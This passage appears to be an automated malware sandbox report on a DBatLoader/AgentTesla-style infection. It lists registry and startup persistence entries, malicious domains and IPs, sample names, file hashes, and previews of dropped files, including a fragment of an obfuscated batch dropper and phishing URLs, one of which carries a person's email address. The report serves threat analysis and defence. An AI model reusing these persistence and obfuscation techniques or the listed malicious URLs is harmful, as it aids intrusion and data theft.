                                                                          15:28:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                          15:28:21Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                          15:28:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                          15:28:33AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          198.252.105.91DHL-INVOICE-MBV.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
                                                                          104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                          • api.ipify.org/
                                                                          Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • api.ipify.org/
                                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                          • api.ipify.org/
                                                                          51.195.88.199Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                            New_Order_PO_GM5637H93.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLine, XWormBrowse
                                                                              New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                  New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                                                                    RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                      PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                          RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                            ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              s82.gocheapweb.comZiraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              • 51.195.88.199
                                                                                              New_Order_PO_GM5637H93.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLine, XWormBrowse
                                                                                              • 51.195.88.199
                                                                                              New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              • 51.195.88.199
                                                                                              AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                              • 51.195.88.199
                                                                                              New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                                                                              • 51.195.88.199
                                                                                              RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                              • 51.195.88.199
                                                                                              PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                              • 51.195.88.199
                                                                                              PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                              • 51.195.88.199
                                                                                              RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                              • 51.195.88.199
                                                                                              ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              • 51.195.88.199
                                                                                              api.ipify.orgBooking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.26.12.205
                                                                                              Purchase order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.26.12.205
                                                                                              https://www.canva.com/design/DAGV5ZsI2aM/Y4DbzinsvfGp5Ll4c_oJJQ/view?utm_content=DAGV5ZsI2aM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                              • 104.26.13.205
                                                                                              Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              • 104.26.12.205
                                                                                              Swift Copy.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 104.26.13.205
                                                                                              Pago por adelantado_ USD 72000 (50%).exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.26.13.205
                                                                                              SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.26.13.205
                                                                                              Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 172.67.74.152
                                                                                              Creal.exeGet hashmaliciousCreal StealerBrowse
                                                                                              • 104.26.13.205
                                                                                              #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                                                                                              • 104.26.12.205
                                                                                              gxe0.comZiraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              • 198.252.105.91
                                                                                              NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                              • 198.252.105.91
                                                                                              NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                              • 198.252.105.91
                                                                                              New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              • 198.252.105.91
                                                                                              pywolwnvd.bizZiraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              • 54.244.188.177
                                                                                              AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                              • 54.244.188.177
                                                                                              E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                              • 54.244.188.177
                                                                                              Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 54.244.188.177
                                                                                              AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 54.244.188.177
                                                                                              SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                              • 54.244.188.177
                                                                                              AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 54.244.188.177
                                                                                              RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                              • 54.244.188.177
                                                                                              PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                              • 54.244.188.177
                                                                                              PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                              • 54.244.188.177
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              HAWKHOSTCAZiraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              • 198.252.105.91
                                                                                              NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                              • 198.252.105.91
                                                                                              NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                              • 198.252.105.91
                                                                                              New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              • 198.252.105.91
                                                                                              Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                              • 198.252.98.54
                                                                                              SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                              • 198.252.98.54
                                                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                              • 198.252.106.191
                                                                                              https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_AGet hashmaliciousUnknownBrowse
                                                                                              • 198.252.106.147
                                                                                              Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                                                              • 198.252.106.191
                                                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                              • 198.252.106.191
                                                                                              CLOUDFLARENETUShttps://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                              • 104.26.5.39
                                                                                              https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                              • 172.67.72.174
                                                                                              E7X-XIZ5.emlGet hashmaliciousUnknownBrowse
                                                                                              • 104.18.95.41
                                                                                              Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              http://track.reviewmgr.com/ls/click?upn=u001.W5y-2Fhe84rCuLxXDO470nfuKD2Iz98QeQpE-2BkxRR0H-2BqB5cDKklujIJ5FLru7QrAASOSa17vR-2FSCLVAx4lWyy5Q-3D-3DkaP7_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiKUAGjaILaAN0mF43Ydvv3aAXjCPBMrYvHXhqj-2F90M8IWSluK-2FDr0h4-2FIbAXpExZIWOjtRSKBCrpvm-2BHKZd6Q2itOPvvv8Wh8uHJq1rbQgzA8HMkQB3GP7mtgLvWqf-2F2SUC5eKSSwLqPZnnofRHoc7cSU1xfupfl4il6cb3-2BSKrTYe1odI0Jq1F3XJEtoagDhZ-2B0poPJjuweCyekPO2Y39xfy8FdwLLvVUma4NgVhDhlM-3DGet hashmaliciousUnknownBrowse
                                                                                              • 104.17.25.14
                                                                                              https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                              • 162.159.61.3
                                                                                              https://renosuperstore.ca/shop/vanities/tesoro/tesoro-smally-collection/Get hashmaliciousUnknownBrowse
                                                                                              • 162.159.140.33
                                                                                              https://complianceapps.zendesk.com/agent/tickets/383359Get hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              L2G-AHW9.emlGet hashmaliciousUnknownBrowse
                                                                                              • 104.18.95.41
                                                                                              z94SolicituddecotizacionStro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              OVHFRhttps://sharepoint-business.com/?rid=eprRhgrGet hashmaliciousUnknownBrowse
                                                                                              • 51.178.43.144
                                                                                              http://matomo.uk.oxa.cloudGet hashmaliciousUnknownBrowse
                                                                                              • 51.195.180.103
                                                                                              zgp.elfGet hashmaliciousMiraiBrowse
                                                                                              • 51.222.237.206
                                                                                              mNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                                                                                              • 51.75.33.127
                                                                                              75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                                                              • 46.105.114.137
                                                                                              Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              • 51.195.88.199
                                                                                              https://klick.publikator.se/?BREV_ID=592&EPOST=kent.isaksson@platspecialisten.se&URL=https://link.mail.tailwindapp.com/c/443/65791c056ee100f6e0b1ce0da6ffd5aaa4304af6d9041064814b00b317faceeaGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 192.99.218.232
                                                                                              RFQ_TFS-1508-AL NASR ENGINEERING.exeGet hashmaliciousRedLineBrowse
                                                                                              • 193.70.111.186
                                                                                              botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                              • 37.187.76.119
                                                                                              5r3fqt67ew531has4231.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 178.32.95.230
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://webconference.protected-forms.com/XaGFyNXNiVFNRd1VaOFBwaER2WW5KM1V1S1NLSzZZZDhjN3NKVC9oV2lCRlNRWmVpbVlYY0JzbS81VUd0czRzOHNRWWNGSndpSCtxMm15d3h6SnFIS0VpR2NHcHh2MWo5Nm1wM3lROHdlakpZdnVWYUpHZDJ2LzVyV1ljWjZuK2pHcTByTjRWRm1IRnpPSnVmUFI0TVk2dHN5L1Yxdko0Y01WeHZYck1iM2tvc3l4YVdqSlZabWl2Y0ZwLzQtLVZvU05jS1M1U0FEQjZZeHUtLUw3WXM4dkFWa2t2YTRLMXJEYTRIbGc9PQ==?cid=2270944670Get hashmaliciousKnowBe4Browse
                                                                                              • 104.26.13.205
                                                                                              HvOPtSE7cm.dllGet hashmaliciousElizaRATBrowse
                                                                                              • 104.26.13.205
                                                                                              Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.26.13.205
                                                                                              9LrEuTWP8s.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                              • 104.26.13.205
                                                                                              HAeAec7no3.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                              • 104.26.13.205
                                                                                              EUFOvMxM2H.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                              • 104.26.13.205
                                                                                              https://customization-connect-7617.my.salesforce.com/sfc/p/d3000000Byor/a/d300000000RR/ML8ajzoJU6aJIvGQZGZ6S9rRHpaD1XaytKzcNGEf56gGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.26.13.205
                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                              • 104.26.13.205
                                                                                              Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.26.13.205
                                                                                              https://shorten.is/meta_copyright_support_teamt5256Get hashmaliciousUnknownBrowse
                                                                                              • 104.26.13.205
                                                                                              a0e9f5d64349fb13191bc781f81f42e1Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 198.252.105.91
                                                                                              Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 198.252.105.91
                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                              • 198.252.105.91
                                                                                              Payment advice_USD75,230.18.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 198.252.105.91
                                                                                              Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 198.252.105.91
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 198.252.105.91
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                              • 198.252.105.91
                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                              • 198.252.105.91
                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                              • 198.252.105.91
                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                              • 198.252.105.91
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\Public\Libraries\lxsyrsiW.pifZiraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                  NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                                    r876789878767.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                      2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                        New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                            z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                              z1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                Order Specifications for Materials.docx.vbsGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                  Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1290240
                                                                                                                  Entropy (8bit):5.277769683130694
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:mImGUcsvZZdubv7hfl3/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlPsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                  MD5:C151F3A6FA9381DA97B91A261FDFFF5A
                                                                                                                  SHA1:0AE76EDB1F584976C9961BECEE210E15EFFEFF9E
                                                                                                                  SHA-256:C393F090F2D2950341BAF2D670F12AA109268AE827BC777CD49C3D30FB7D93D0
                                                                                                                  SHA-512:E8E9896AF5890EC3BBB8BD10D49C7B66B93A482ACE0D0C303B8E2B58BC98880FF70AA8207C08884FCFDF879EC26147CA1DAA097940B744F66C57C1DE3A113334
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4
                                                                                                                  Entropy (8bit):2.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:gov:gov
                                                                                                                  MD5:D17B8377F66273771CD3B5165F393561
                                                                                                                  SHA1:4218581488233698A293E3BF395DEA242601910A
                                                                                                                  SHA-256:BAD8A8C24E18664287F4F20CB8DE2B089525D51F939C537B471F2D273FB66F3F
                                                                                                                  SHA-512:38C9C49E34D4057CC084BABB9791E603F81AB0CB64E1973896C3615CD18B09B26E2375EE273B7D7180DE98A9369F71A63783E55CC1C854BF7B08939E82DE85DB
                                                                                                                  Malicious:false
                                                                                                                  Preview:76..
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1855488
                                                                                                                  Entropy (8bit):7.397962752825014
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBZ:ULhRGYHKOBZ
                                                                                                                  MD5:1A67EDB62C0400F2AC88DAFB6F2E6047
                                                                                                                  SHA1:757301130500E1E316FE7CA00FD44EB4049117AA
                                                                                                                  SHA-256:0F2B642FB051D99109789C0F6C714E411EB5C6CC7E791D76801DBB8E7B3FB486
                                                                                                                  SHA-512:5795F1308E542213D556D13FB8DE321E263EE1723D964A7E10997CA9211086476FC509E264C4092305EB6D288DC7EA39AC1ED1F441D0B5F880F8D60461829EEF
                                                                                                                  Malicious:true
                                                                                                                  Preview:...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.
                                                                                                                  Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1081856
                                                                                                                  Entropy (8bit):6.9272903664814445
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:BJSK4Kavab3wMeAOr6ZFlR+gKT44VoIOL7zk:7K1WYL6L
                                                                                                                  MD5:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                                  SHA1:97340CA203A1207E492135D580C6860A724A227F
                                                                                                                  SHA-256:F711703C8BA66DCEDB8E4B83F21A0425C528E278242C852FD5CF54BB43E30454
                                                                                                                  SHA-512:6C217FA37CC4C655CDA0A2A491E49AC736E4940027178B3C7D6488D296923D40CC26A4D0142052B94B58491FA90F17AB3F4115CB0C75EFE09175E732D62DBBF5
                                                                                                                  Malicious:true
                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...N......\G.......P....@.......................... ...................@..............................6%..............................0r..................................................................................text....&.......(.................. ..`.itext.......@.......,.............. ..`.data........P.......4..............@....bss.....6...p.......R...................idata..6%.......&...R..............@....tls....4............x...................rdata...............x..............@..@.reloc..0r.......t...z..............@..B.rsrc...............................@..@............. ......................@..@................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                  File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):62357
                                                                                                                  Entropy (8bit):4.705712327109906
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                  MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                  SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                  SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                  SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):68096
                                                                                                                  Entropy (8bit):6.328046551801531
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                  MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                  SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                  SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                  SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse
                                                                                                                  • Filename: NEOMS_EOI_FORM.cmd, Detection: malicious, Browse
                                                                                                                  • Filename: NEOMS_EOI_FORM.GZ, Detection: malicious, Browse
                                                                                                                  • Filename: r876789878767.cmd, Detection: malicious, Browse
                                                                                                                  • Filename: 2tKeEoCCCw.exe, Detection: malicious, Browse
                                                                                                                  • Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious, Browse
                                                                                                                  • Filename: E_dekont.cmd, Detection: malicious, Browse
                                                                                                                  • Filename: z1Transaction_ID_REF2418_cmd.bat, Detection: malicious, Browse
                                                                                                                  • Filename: z1SWIFT_MT103_Payment_552016_cmd.bat, Detection: malicious, Browse
                                                                                                                  • Filename: Order Specifications for Materials.docx.vbs, Detection: malicious, Browse
                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):104
                                                                                                                  Entropy (8bit):5.094576921115185
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxESdbuA8ovn:HRYFVmTWDyzPtZExEUbP8y
                                                                                                                  MD5:0ABEA770C4DAE137972E544E2A8E832E
                                                                                                                  SHA1:8E11A1C82EDE558F8338064A456087A64C8FED8C
                                                                                                                  SHA-256:83F80BAFC9E20708ECD18BF4A5B442127C8D42CEB968CD743FAC09B5F273CABD
                                                                                                                  SHA-512:B2A49E6D3EA4EC2EB0D8D9D39F4AC1BD8BF0270E1817424B8FD2FAE6EDBFD630D88844C3F73A4BD5AA0CA5CDA9FD3EC35D07A3E840DE0F29CF1CEE9050E6EDAB
                                                                                                                  Malicious:true
                                                                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=954764..HotKey=85..
                                                                                                                  Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):236544
                                                                                                                  Entropy (8bit):6.4416694948877025
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                  MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                  SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
